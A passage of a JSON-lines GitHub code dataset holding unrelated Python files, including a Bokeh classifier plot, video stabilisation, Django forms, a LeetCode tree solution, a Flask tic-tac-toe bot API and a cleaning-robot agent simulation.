unique values found for column: {}\".format(column))\n print(\" {:d} unique values expected; {:d} values found.\".format(n_values_expected, n_values))\n elif not np.array_equal(col_data, expected_time_vals[column]):\n expected_max = expected_time_vals[column][0]\n expected_min = expected_time_vals[column][-1]\n print(\"Unexpected count of values for column: {}\".format(column))\n print(\" Most common value expected {:d} data points; {:d} trips found.\".format(expected_max, col_data[0]))\n print(\" Least common value expected {:d} data points; {:d} trips found.\".format(expected_min, col_data[-1]))\n else:\n n_correct += 1\n\n if n_correct == len(expected_time_vals.keys()) + 2:\n print(\"All counts are as expected!\")","repo_name":"udacity/data-analyst","sub_path":"projects_zh/P0 bike_sharing/babs_datacheck.py","file_name":"babs_datacheck.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"37"} +{"seq_id":"22753995441","text":"import numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.linear_model import LogisticRegression\nfrom bokeh.layouts import gridplot\nfrom bokeh.plotting import figure, show\n\niris = load_iris()\nX = iris.data\ny = iris.target\n\nclf = LogisticRegression(random_state=0, multi_class='multinomial')\nclf.fit(X, y)\n\nplots = []\nfor i in range(4):\n for j in range(i+1, 4):\n p = figure(title=f\"Class distribution by {iris.feature_names[i]} and {iris.feature_names[j]}\",\n x_axis_label=iris.feature_names[i],\n y_axis_label=iris.feature_names[j])\n classes = [0, 1, 2]\n colors = ['red', 'green', 'blue']\n for c, color in zip(classes, colors):\n idx = np.where(y == c)[0]\n p.circle(X[idx, i], X[idx, j], color=color, alpha=0.5, legend_label=f\"Class {c}\")\n\n xx, yy = np.meshgrid(np.linspace(X[:, i].min(), X[:, i].max(), 100),\n np.linspace(X[:, j].min(), X[:, j].max(), 100))\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel(), xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n p.multi_line(xs=[xx[Z == c] for c in classes],\n ys=[yy[Z == c] for c in classes],\n color=colors,\n line_width=2)\n plots.append(p)\n\nshow(gridplot(plots, ncols=2))\n","repo_name":"Sisyphoz/ml-sklearn-bokeh","sub_path":"sklearn_bokeh_v1.py","file_name":"sklearn_bokeh_v1.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29665180943","text":"# Installed package\nimport numpy as np\nimport cv2\nfrom vidgear.gears import VideoGear\n\n\ndef stablize_video(path = 'video.mp4'):\n '''\n Function for stablizing Videos\n\n path : str\n Path of the video file\n\n Returns\n None\n\n '''\n # open any valid video stream with stabilization enabled(`stabilize = True`)\n stream_stab = VideoGear(source=path, stabilize=True, **{\"SMOOTHING_RADIUS\":50, \"BORDER_TYPE\":\"replicate\"}).start()\n\n # open same stream without stabilization for comparison\n stream_org = VideoGear(source=path).start()\n\n # loop over\n while True:\n\n # read stabilized frames\n frame_stab = stream_stab.read()\n\n # check for stabilized frame if Nonetype\n if frame_stab is None:\n break\n\n # read un-stabilized frame\n frame_org = stream_org.read()\n\n # concatenate both frames\n output_frame = np.concatenate((frame_org, frame_stab), axis=1)\n\n # put text over concatenated frame\n cv2.putText(\n output_frame,\n \"Before\",\n (10, output_frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.6,\n (0, 255, 0),\n 2,\n )\n cv2.putText(\n 
output_frame,\n \"After\",\n (output_frame.shape[1] // 2 + 10, output_frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.6,\n (0, 255, 0),\n 2,\n )\n \n output_frame = cv2.resize(output_frame, (0, 0), fx = 0.3, fy = 0.3)\n # Show output window\n cv2.imshow(\"Stabilized Frame\", output_frame)\n\n # check for 'q' key if pressed\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n\n # close output window\n cv2.destroyAllWindows()\n\n # safely close both video streams\n stream_org.stop()\n stream_stab.stop()\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='FcarScan Task - Video stabilization')\n\n parser.add_argument('--path', default='video.mp4', type=str, help='Path of the Video file')\n\n args = parser.parse_args()\n\n stablize_video(path = args.path)","repo_name":"bijonguha/Video-Stablization","sub_path":"img_stab.py","file_name":"img_stab.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23146318486","text":"from configparser import ConfigParser\r\n\r\ndef config(filename=\"database.ini\", section=\"postgresql\"):\r\n #Se crea parser\r\n parser = ConfigParser()\r\n # read config file\r\n parser.read(filename)\r\n db = {}\r\n if parser.has_section(section):\r\n params = parser.items(section)\r\n for param in params:\r\n db[param[0]] = param[1]\r\n else:\r\n raise Exception('Section{0} is not found in the {1} file. rgt'.format(section, filename))\r\n print(db)\r\n \r\nconfig()","repo_name":"MatiasRGT/BaseDatos1_uni","sub_path":"no_usados/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36824199059","text":"from django import forms\nfrom django.db import models\n\nfrom mainapp.models import User, School, Room, Building, Topic, Course, Program, CourseSchedule, Question\nIMP_CHOICES = (\n ('Nepal', 'Nepal'),\n ('Bhutan', 'Bhutan'),\n ('Sweden', 'Sweden'),\n)\netcfield = models.CharField(max_length=100, choices=IMP_CHOICES)\n\n\nclass StaffForm(forms.ModelForm):\n class Meta:\n model = User\n exclude = ('dob', 'special_care_needed', 'subject_of_interest',)\n\n\nclass StudentForm(forms.ModelForm):\n class Meta:\n model = User\n exclude = ('designation',)\n\n\nclass ParentForm(forms.ModelForm):\n class Meta:\n model = User\n exclude = ('designation', 'subject_of_interest', 'special_care_needed','dob',)\n\n\n\n\ndef getform(formtype):\n if formtype == 'Schools':\n modelform = School\n elif formtype == 'Rooms':\n modelform = Room\n elif formtype == 'Buildings':\n modelform = Building\n elif formtype == 'Topics':\n modelform = Topic\n elif formtype == 'Courses':\n modelform = Course\n elif formtype == 'Programs':\n modelform = Program\n elif formtype == 'CourseSchedules':\n modelform = CourseSchedule\n elif formtype == 'Questions':\n modelform = Question\n return(modelform)\n\nclass MyStyleForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(MyStyleForm, self).__init__(*args, **kwargs)\n\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n","repo_name":"surazaz/Social_network","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71942463148","text":"'''\nCreated on 
2015年12月12日\nhttps://leetcode.com/problems/minimum-height-trees/\n@author: Darren\n'''\n'''\nFor a undirected graph with tree characteristics, we can choose any node as the root. The result graph is then a rooted tree. Among all possible rooted trees, those with minimum height are called minimum height trees (MHTs). Given such a graph, write a function to find all the MHTs and return a list of their root labels.\n\nFormat\nThe graph contains n nodes which are labeled from 0 to n - 1. You will be given the number n and a list of undirected edges (each edge is a pair of labels).\n\nYou can assume that no duplicate edges will appear in edges. Since all edges are undirected, [0, 1] is the same as [1, 0] and thus will not appear together in edges.\n\nExample 1:\n\nGiven n = 4, edges = [[1, 0], [1, 2], [1, 3]]\n\n 0\n |\n 1\n / \\\n 2 3\nreturn [1]\n\nExample 2:\n\nGiven n = 6, edges = [[0, 3], [1, 3], [2, 3], [4, 3], [5, 4]]\n\n 0 1 2\n \\ | /\n 3\n |\n 4\n |\n 5\nreturn [3, 4]\n'''\ndef findMinHeightTrees(n, edges):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :rtype: List[int]\n \"\"\"\n if not edges or n==1:\n return [0]\n adj=[set() for i in range(n)]\n for i,j in edges:\n adj[i].add(j)\n adj[j].add(i)\n leaves=[nodeIndex for nodeIndex in range(n) if len(adj[nodeIndex])==1]\n while n>2:\n n-=len(leaves)\n newLeaves=[]\n for leaf in leaves:\n adjLeaf=adj[leaf].pop()\n adj[adjLeaf].remove(leaf)\n if len(adj[adjLeaf])==1:\n newLeaves.append(adjLeaf)\n leaves=newLeaves\n return leaves\nn = 6\nedges = [[0, 3], [1, 3], [2, 3], [4, 3], [5, 4]] \nprint(findMinHeightTrees(n, edges)) \n ","repo_name":"darrencheng0817/AlgorithmLearning","sub_path":"Python/leetcode/minimumHeightTrees.py","file_name":"minimumHeightTrees.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4307137515","text":"import logging\nfrom urllib import response\nfrom bot import Bot\nfrom tictactoe import TicTacToe\nfrom tictactoenet import TicTacToeNet\nfrom utils import *\nimport numpy as np\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\nfrom os import environ\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\ndef factory(): \n argsEasy = dotdict({\n 'numMCTSRuns': 5, # number of MCTS runs per move in game \n 'cpuct': 1, # upper confidence bound exploration hyperparameter\n })\n\n argsHard = dotdict({\n 'numMCTSRuns': 20, # number of MCTS runs per move in game \n 'cpuct': 1, # upper confidence bound exploration hyperparameter\n })\n\n netArgs = dotdict({\n 'lr': 0.001,\n 'numEpochs': 100,\n 'batchSize': 64,\n })\n\n game = TicTacToe()\n\n netEasy = TicTacToeNet(game, netArgs) \n botEasy = Bot(game, netEasy, argsEasy)\n botEasyDirectoryPath = \"./experiments/2022-02-19-21:59:00/bot0\"\n botEasy.load(botEasyDirectoryPath)\n\n netHard = TicTacToeNet(game, netArgs) \n botHard = Bot(game, netHard, argsHard)\n botHardDirectoryPath = \"./experiments/2021-12-31-15:54:17/bot3\"\n botHard.load(botHardDirectoryPath)\n\n app = Flask(__name__)\n CORS(app)\n\n @app.route(\"/\")\n def welcome():\n return f'Welcome to the Alpha TicTacToe Zero Server'\n\n @app.route('/api', methods=[\"GET\", 'POST'])\n def api():\n if request.method == \"POST\":\n dic = request.get_json()\n if 'botIsO' not in dic or 'easyMode' not in dic or 'boardString' not in dic: return f\"request is not valid\"\n print(dic)\n botIsO, easyMode, boardString = dic['botIsO'], dic['easyMode'], 
dic['boardString']\n board = np.zeros((3, 3))\n if not (boardString and len(boardString) == 9): return f'boardString length is not valid'\n for r in range(3):\n for c in range(3):\n d = boardString[3*r + c]\n if d == 'o': board[r][c] = 1\n elif d == 'x': board[r][c] = -1\n elif d == '-': continue\n else: return f'boardString value at index {r * 3 + c} is not valid'\n if game.get_outcome(board) != None: return f'game has ended'\n canonicalBoard = game.get_canonical_board(board, 1) if botIsO == \"true\" else game.get_canonical_board(board, -1)\n pi = botEasy.get_pi(canonicalBoard, temp=0) if easyMode == \"true\" else botHard.get_pi(canonicalBoard, temp=0)\n a = np.random.choice(len(pi), p=pi)\n return f\"{a}\", 200\n else:\n message = {\"greeting\": \"Hello from the API\"}\n return jsonify(message)\n\n return app\n \nif __name__ == \"__main__\":\n app = factory()\n app.run(host='127.0.0.1', port=environ.get('PORT', 5000))","repo_name":"TeYuanLiu/alpha_zero","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28859447992","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'anidex_django.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^refresh', 'index.views.get_stats'),\n url(r'^$', 'index.views.main'),\n url(r'^whitelist', 'index.views.whitelist'),\n)\n","repo_name":"Dokifansubs/anidex_django","sub_path":"anidex_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24131310405","text":"import random\r\nsayı=random.randint(1,100)\r\nhak=int(input(\"kaç hakkınız olsun: \"))\r\ncan=hak\r\npuan=100\r\nwhile hak>0:\r\n hak-=1\r\n giris=int(input(\"tahimini sayi griniz: \"))\r\n if giris>sayı:\r\n puan-=(100/can)\r\n print(\"daha küçük\")\r\n elif giris 3:\r\n d1 = deterimine_direction(path[0], path[1])\r\n d2 = deterimine_direction(path[1], path[2])\r\n nx, ny = path[1]\r\n if d1 == d2 and isinstance(env[nx][ny][1], Void):\r\n robot.move(env, env_info, path, 2)\r\n return\r\n elif len(path) == 2:\r\n robot.drop()\r\n return\r\n\r\n robot.move(env, env_info, path, 1)\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n void_cells, dirty_cells = env_info['void-cells'], env_info['dirty-cells']\r\n return robot.check_dirty_alert(void_cells, dirty_cells)\r\n\r\n return Objective(find, perform, check_if_completed, name=\"dirty-alert\")\r\n\r\n @staticmethod\r\n def build_clean_objective():\r\n def find(objective, env, robot, env_info):\r\n robot_pos = robot.x, robot.y\r\n rows, cols = len(env), len(env[0])\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n closest_path_dirt_len = rows * cols\r\n closest_dirt_pos = -1, -1\r\n for x in range(rows):\r\n for y in range(cols):\r\n if isinstance(env[x][y][1], Dirt) and visit[x][y] != 0 and visit[x][y] < closest_path_dirt_len:\r\n closest_path_dirt_len = visit[x][y]\r\n closest_dirt_pos = x, y\r\n \r\n if isinstance(env[robot.x][robot.y][1], Dirt):\r\n closest_dirt_pos = robot.x, robot.y\r\n \r\n if closest_dirt_pos == (-1, -1):\r\n return [robot_pos]\r\n \r\n return build_path(robot_pos, closest_dirt_pos, pi)\r\n\r\n def 
perform(objective, env, robot, env_info):\r\n robot_pos = robot.x, robot.y\r\n path = find(objective, env, robot, env_info)\r\n x, y = robot_pos\r\n\r\n if len(path) == 1:\r\n robot.clean(env)\r\n return\r\n \r\n if robot.carried_child: \r\n if len(path) > 3:\r\n d1 = deterimine_direction(path[0], path[1])\r\n d2 = deterimine_direction(path[1], path[2])\r\n nx, ny = path[1]\r\n if d1 == d2 and isinstance(env[nx][ny][1], Void):\r\n robot.move(env, env_info, path, 2)\r\n return\r\n elif len(path) == 2:\r\n robot.drop()\r\n return\r\n\r\n robot.move(env, env_info, path, 1)\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n rx, ry = robot.x, robot.y\r\n if objective.on_dirty_cell:\r\n objective.on_dirty_cell = False\r\n return True\r\n \r\n objective.on_dirty_cell = isinstance(env[rx][ry][1], Dirt)\r\n return False\r\n\r\n return Objective(find, perform, check_if_completed, name=\"clean\")\r\n \r\n @staticmethod\r\n def build_bring_children_to_playpen_objective():\r\n def find_child(env, robot):\r\n robot_pos = robot.x, robot.y\r\n rows, cols = len(env), len(env[0])\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n closest_path_child_len = rows * cols\r\n closest_child_pos = -1, -1\r\n for x in range(rows):\r\n for y in range(cols):\r\n if isinstance(env[x][y][1], Child) and visit[x][y] != 0 and visit[x][y] < closest_path_child_len:\r\n closest_path_child_len = visit[x][y]\r\n closest_child_pos = x, y\r\n \r\n if isinstance(env[robot.x][robot.y][1], Child):\r\n closest_child_pos = robot.x, robot.y\r\n \r\n if closest_child_pos == (-1, -1):\r\n return [robot_pos]\r\n \r\n return build_path(robot_pos, closest_child_pos, pi)\r\n \r\n def find_playpen(env, robot, children):\r\n robot_pos = robot.x, robot.y\r\n rows, cols = len(env), len(env[0])\r\n obstacles = ((Void, Obstacle, Void), (Void, Playpen, Child))\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n closest_path_playpen_len = rows * cols\r\n closest_playpen_pos = -1, -1\r\n in_play_pen = children_in_play_pen(env)\r\n\r\n for x in range(rows):\r\n for y in range(cols):\r\n if isinstance(env[x][y][1], Playpen) and visit[x][y] != 0 and visit[x][y] < closest_path_playpen_len and \\\r\n (in_play_pen == len(children) - 1 or not creates_a_barrier(env, (x,y), robot_pos)):\r\n closest_path_playpen_len = visit[x][y]\r\n closest_playpen_pos = x, y\r\n \r\n if isinstance(env[robot.x][robot.y][1], Playpen):\r\n closest_playpen_pos = robot.x, robot.y\r\n \r\n pos = closest_playpen_pos\r\n\r\n if pos == (-1, -1):\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n farthest_path_playpen_len = 0\r\n farthest_playpen_pos = -1, -1\r\n\r\n target_cells = (Void, Playpen, Void),\r\n for x in range(rows):\r\n for y in range(cols):\r\n if match_types(env[x][y], target_cells) and visit[x][y] != 0 and visit[x][y] > farthest_path_playpen_len:\r\n farthest_path_playpen_len = visit[x][y]\r\n farthest_playpen_pos = x, y\r\n \r\n pos = farthest_playpen_pos\r\n \r\n return build_path(robot_pos, pos, pi)\r\n \r\n def find(objective, env, robot, env_info):\r\n children = env_info['children']\r\n return not robot.carried_child and find_child(env, robot) or find_playpen(env, robot, children)\r\n\r\n def perform(objective, env, robot, env_info):\r\n robot_pos = robot.x, robot.y\r\n path = find(objective, env, robot, env_info)\r\n x, y = robot_pos\r\n\r\n if isinstance(env[x][y][1], Playpen) and robot.carried_child:\r\n robot.drop()\r\n 
return\r\n \r\n if robot.carried_child and len(path) >= 3:\r\n d1 = deterimine_direction(path[0], path[1])\r\n d2 = deterimine_direction(path[1], path[2])\r\n nx, ny = path[1]\r\n if d1 == d2 and isinstance(env[nx][ny][1], Void):\r\n robot.move(env, env_info, path, 2)\r\n return\r\n \r\n if len(path) > 1:\r\n robot.move(env, env_info, path, 1)\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n rx, ry = robot.x, robot.y\r\n return match_types(env[rx][ry], ((Agent, Playpen, Child),)) and not robot.carried_child\r\n\r\n return Objective(find, perform, check_if_completed, name=\"bring-children-to-playpen\")\r\n\r\n @staticmethod\r\n def build_clear_block_objective():\r\n def find(objective, env, robot, env_info):\r\n blocked_pos = env_info['blocked-position']\r\n robot_pos = robot.x, robot.y\r\n new_pos = blocked_pos\r\n if robot_pos == blocked_pos and robot.carried_child:\r\n obstacles = ((Void, Obstacle, Void), (Void, Playpen, Child))\r\n for dx, dy in directions:\r\n nx, ny = robot.x + dx, robot.y + dy\r\n if inside(env, nx, ny) and not match_types(env[nx][ny], obstacles):\r\n new_pos = nx, ny\r\n \r\n dx, dy = deterimine_direction(new_pos, robot_pos)\r\n # to leave the direction in unit when target blocked pos is 2 cells from robot\r\n dx, dy = dx and dx // abs(dx), dy and dy // abs(dy)\r\n path = []\r\n curr_x, curr_y = new_pos\r\n while (curr_x, curr_y) != robot_pos:\r\n path.append((curr_x, curr_y))\r\n curr_x, curr_y = curr_x + dx, curr_y + dy\r\n path.append(robot_pos)\r\n path.reverse()\r\n\r\n return path\r\n\r\n def perform(objective, env, robot, env_info):\r\n path = find(objective, env, robot, env_info)\r\n robot_pos = robot.x, robot.y\r\n blocked_pos = env_info['blocked-position']\r\n if robot_pos != blocked_pos and robot.carried_child:\r\n robot.drop()\r\n elif len(path) > 1:\r\n robot.move(env, env_info, path, 1)\r\n elif robot_pos == blocked_pos and isinstance(env[robot.x][robot.y][1], Dirt):\r\n robot.clean(env)\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n bx, by = env_info['blocked-position']\r\n\r\n return isinstance(env[bx][by][1], (Void, Agent)) or \\\r\n (isinstance(env[bx][by][1], Playpen) and isinstance(env[bx][by][2], Void))\r\n\r\n return Objective(find, perform, check_if_completed, name=\"clear-block\")\r\n \r\n @staticmethod\r\n def build_move_in_playpen_objective():\r\n def find(objective, env, robot, env_info):\r\n return objective.path\r\n\r\n def perform(objective, env, robot, env_info):\r\n idx, path = objective.idx, objective.path\r\n robot_pos = robot.x, robot.y\r\n \r\n if idx == len(path):\r\n robot.drop()\r\n elif robot.carried_child:\r\n nx, ny = path[idx]\r\n if isinstance(env[nx][ny][2], Child):\r\n robot.drop()\r\n else:\r\n robot.move(env, env_info, path, idx)\r\n objective.idx += 1\r\n else:\r\n robot.move(env, env_info, path, idx)\r\n objective.idx += 1\r\n \r\n def check_if_completed(objective, env, robot, env_info):\r\n idx, path = objective.idx, objective.path\r\n\r\n return idx == len(path)\r\n\r\n return Objective(find, perform, check_if_completed, name=\"move-in-playpen\")\r\n \r\n def __init__(self, find_func, perform_func, check_if_completed_func, name=None):\r\n self.is_in_course = False\r\n self.find = find_func\r\n self.perform = perform_func\r\n self.check_if_completed = check_if_completed_func\r\n self.name = name\r\n self.on_dirty_cell = False\r\n self.path = None\r\n self.idx = 0\r\n\r\nclass MySmartAgent(Agent):\r\n\r\n def __init__(self, x, y):\r\n super(MySmartAgent, self).__init__(x, 
y)\r\n self.carried_child = None\r\n dirty_alert = Objective.build_dirty_alert_objective()\r\n clean = Objective.build_clean_objective()\r\n bring_children_to_playpen = Objective.build_bring_children_to_playpen_objective()\r\n clear_block = Objective.build_clear_block_objective()\r\n move_in_playpen = Objective.build_move_in_playpen_objective()\r\n self.objectives = { \r\n dirty_alert.name: dirty_alert, clear_block.name: clear_block,\r\n bring_children_to_playpen.name : bring_children_to_playpen, clean.name: clean,\r\n move_in_playpen.name : move_in_playpen\r\n }\r\n \r\n def _move(self, new_pos, env):\r\n nx, ny = new_pos\r\n # Move to new_pos position\r\n x, y = self.x, self.y\r\n self.x, self.y = nx, ny\r\n o1, o2, o3 = env[x][y]\r\n \r\n if o1 == self:\r\n env[x][y] = Void(x, y), o2, o3\r\n elif o2 == self:\r\n env[x][y] = Void(x, y), o1, o3\r\n else:\r\n env[x][y] = o1, o2, Void(x, y)\r\n\r\n if self.carried_child:\r\n _, child_in_pos1, child_in_pos2 = env[x][y]\r\n if isinstance(child_in_pos2, Child):\r\n env[x][y] = Void(x, y), env[x][y][1], Void(x, y)\r\n else:\r\n env[x][y] = Void(x, y), Void(x, y), Void(x, y)\r\n\r\n if isinstance(env[nx][ny][1], Void):\r\n env[nx][ny] = Void(nx, ny), self, Void(nx, ny)\r\n else:\r\n env[nx][ny] = self, env[nx][ny][1], env[nx][ny][2]\r\n \r\n if self.carried_child:\r\n if isinstance(env[nx][ny][1], Playpen):\r\n env[nx][ny] = self, env[nx][ny][1], self.carried_child\r\n else:\r\n env[nx][ny] = self, self.carried_child, Void(nx, ny)\r\n \r\n def drop(self):\r\n if not self.carried_child:\r\n print('CALL TO DROP ON ROBOT WITH NO CARRIED CHILD')\r\n return\r\n \r\n self.carried_child = None\r\n \r\n def _carry_child(self, new_pos, env):\r\n nx, ny = new_pos\r\n # Move to new_pos position\r\n x, y = self.x, self.y\r\n self.x, self.y = nx, ny\r\n o1, o2, o3 = env[x][y]\r\n \r\n if o1 == self:\r\n env[x][y] = Void(x, y), o2, o3\r\n elif o2 == self:\r\n env[x][y] = Void(x, y), o1, o3\r\n else:\r\n env[x][y] = o1, o2, Void(x, y)\r\n\r\n _, child_in_pos1, child_in_pos2 = env[nx][ny]\r\n\r\n if isinstance(child_in_pos1, Child):\r\n env[nx][ny] = self, child_in_pos1, Void(nx, ny)\r\n self.carried_child = child_in_pos1\r\n else:\r\n env[nx][ny] = self, env[nx][ny][1], child_in_pos2\r\n self.carried_child = child_in_pos2\r\n\r\n def get_active_objective(self):\r\n active_objective = None\r\n for objective in self.objectives.values():\r\n if objective.is_in_course:\r\n active_objective = objective\r\n break\r\n \r\n return active_objective\r\n\r\n def trigger_clear_block_objective(self, env, env_info):\r\n active_objective = self.get_active_objective()\r\n if active_objective:\r\n active_objective.is_in_course = False\r\n active_objective = self.objectives['clear-block']\r\n active_objective.is_in_course = True\r\n self.perform_action(env, env_info)\r\n \r\n def trigger_move_in_playpen_objective(self, env, env_info, path, idx):\r\n active_objective = self.get_active_objective()\r\n if active_objective:\r\n active_objective.is_in_course = False\r\n active_objective = self.objectives['move-in-playpen']\r\n active_objective.is_in_course = True\r\n active_objective.path = path\r\n active_objective.idx = idx\r\n self.perform_action(env, env_info)\r\n\r\n def move(self, env, env_info, path, idx):\r\n children = env_info['children']\r\n nx, ny = path[idx]\r\n availables = ((Void, Void, Void), (Void, Playpen, Void))\r\n\r\n child_in_play_pen = ((Void, Playpen, Child),)\r\n if self.carried_child and match_types(env[nx][ny], child_in_play_pen):\r\n # trigger 
move-in-playpen objective\r\n self.trigger_move_in_playpen_objective(env, env_info, path, idx)\r\n return\r\n\r\n for child in children:\r\n child_pos = child.x, child.y\r\n if child_pos == path[idx]:\r\n if self.carried_child and not match_types(env[nx][ny], availables):\r\n # trigger clear-block objective\r\n env_info['blocked-position'] = nx, ny\r\n self.trigger_clear_block_objective(env, env_info)\r\n else:\r\n if self.carried_child:\r\n self.carried_child.x, self.carried_child.y = nx, ny\r\n self._carry_child(path[idx], env)\r\n return\r\n \r\n if self.carried_child and not match_types(env[nx][ny], availables):\r\n # trigger clear-block objective\r\n env_info['blocked-position'] = nx, ny\r\n self.trigger_clear_block_objective(env, env_info)\r\n else:\r\n if self.carried_child:\r\n self.carried_child.x, self.carried_child.y = nx, ny\r\n self._move(path[idx], env)\r\n\r\n def check_dirty_alert(self, void_cells, dirty_cells):\r\n return dirty_cells >= 0.55 * (void_cells + dirty_cells)\r\n \r\n def clean(self, env):\r\n x, y = self.x, self.y\r\n robot = env[x][y][0]\r\n env[x][y] = (Void(x, y), robot, Void(x, y))\r\n\r\n def get_closest_objective(self, env, pi, visit, objectives_targets=None):\r\n robot_pos = self.x, self.y\r\n rows, cols = len(env), len(env[0])\r\n\r\n closest_path_len = rows * cols\r\n closest_target_pos = -1, -1\r\n objectives_targets = objectives_targets or (self.carried_child and \\\r\n ((Void, Playpen, Void), (Void, Dirt, Void)) or ((Void, Child, Void), (Void, Dirt, Void)))\r\n\r\n for x in range(rows):\r\n for y in range(cols):\r\n if match_types(env[x][y], objectives_targets) and visit[x][y] != 0 and visit[x][y] < closest_path_len:\r\n closest_path_len = visit[x][y]\r\n closest_target_pos = x, y\r\n \r\n rx, ry = robot_pos\r\n if isinstance(env[rx][ry][1], Playpen) and self.carried_child or isinstance(env[rx][ry][1], Dirt):\r\n closest_target_pos = rx, ry\r\n \r\n tx, ty = closest_target_pos\r\n target = env[tx][ty][1]\r\n objectives_name = isinstance(target, Dirt) and 'clean' or 'bring-children-to-playpen'\r\n \r\n return objectives_name, closest_target_pos\r\n\r\n def perform_action(self, env, env_info):\r\n raise NotImplementedError\r\n\r\nclass ProactiveAgent(MySmartAgent):\r\n def __init__(self, x, y, ignored_objectives_limit=20):\r\n super(ProactiveAgent, self).__init__(x, y)\r\n self.ignored_objectives = 0\r\n self.ignored_objectives_limit = ignored_objectives_limit\r\n self.change_behaviour = False\r\n\r\n def perform_action(self, env, env_info):\r\n dirty_cells = env_info['dirty-cells']\r\n void_cells = env_info['void-cells']\r\n children = env_info['children']\r\n in_play_pen = env_info['in-play-pen']\r\n \r\n active_objective = self.get_active_objective()\r\n\r\n if self.ignored_objectives >= self.ignored_objectives_limit and (not active_objective or not active_objective.on_dirty_cell):\r\n self.ignored_objectives = 0\r\n self.change_behaviour = True\r\n\r\n if (not active_objective or active_objective.name != 'clear-block') and self.check_dirty_alert(void_cells, dirty_cells):\r\n for objective in self.objectives.values():\r\n objective.is_in_course = False\r\n \r\n self.objectives['dirty-alert'].is_in_course = True\r\n\r\n \r\n robot_pos = self.x, self.y\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n if active_objective:\r\n if active_objective.name not in ['clear-block', 'dirty-alert', 'move-in-playpen']:\r\n # Search closest objective\r\n closest_objective_name, closest_target_pos = 
self.get_closest_objective(env, pi, visit)\r\n if active_objective.name != closest_objective_name:\r\n if not self.change_behaviour:\r\n self.ignored_objectives += 1\r\n else:\r\n active_objective.is_in_course = False\r\n active_objective = self.objectives[closest_objective_name]\r\n active_objective.is_in_course = True\r\n self.change_behaviour = False\r\n \r\n active_objective.perform(active_objective, env, self, env_info)\r\n completed = active_objective.check_if_completed(active_objective, env, self, env_info)\r\n\r\n if completed:\r\n active_objective.is_in_course = False\r\n self.ignored_objectives = 0\r\n\r\n else:\r\n # Search closest objective\r\n objective_targets = None\r\n if in_play_pen < len(children):\r\n objective_targets = self.carried_child and ((Void, Playpen, Void),) or ((Void, Child, Void),)\r\n else:\r\n objective_targets = ((Void, Dirt, Void),)\r\n\r\n closest_objective_name, _ = self.get_closest_objective(env, pi, visit, objective_targets)\r\n active_objective = self.objectives[closest_objective_name]\r\n active_objective.is_in_course = True\r\n active_objective.perform(active_objective, env, self, env_info)\r\n completed = active_objective.check_if_completed(active_objective, env, self, env_info)\r\n\r\n if completed:\r\n active_objective.is_in_course = False\r\n self.ignored_objectives = 0\r\n\r\nclass ReactiveAgent(MySmartAgent):\r\n def __init__(self, x, y, interrupted_objectives_limit=10):\r\n super(ReactiveAgent, self).__init__(x, y)\r\n self.interrupted_objectives = 0\r\n self.interrupted_objectives_limit = interrupted_objectives_limit\r\n self.change_behaviour = False\r\n \r\n def __name__(self):\r\n return 'ReactiveAgent'\r\n\r\n def perform_action(self, env, env_info):\r\n dirty_cells = env_info['dirty-cells']\r\n void_cells = env_info['void-cells']\r\n children = env_info['children']\r\n\r\n active_objective = self.get_active_objective()\r\n\r\n if self.interrupted_objectives >= self.interrupted_objectives_limit and (not active_objective or not active_objective.on_dirty_cell):\r\n self.interrupted_objectives_limit = 0\r\n self.change_behaviour = True\r\n\r\n if (not active_objective or active_objective.name != 'clear-block') and self.check_dirty_alert(void_cells, dirty_cells):\r\n for objective in self.objectives.values():\r\n objective.is_in_course = False\r\n 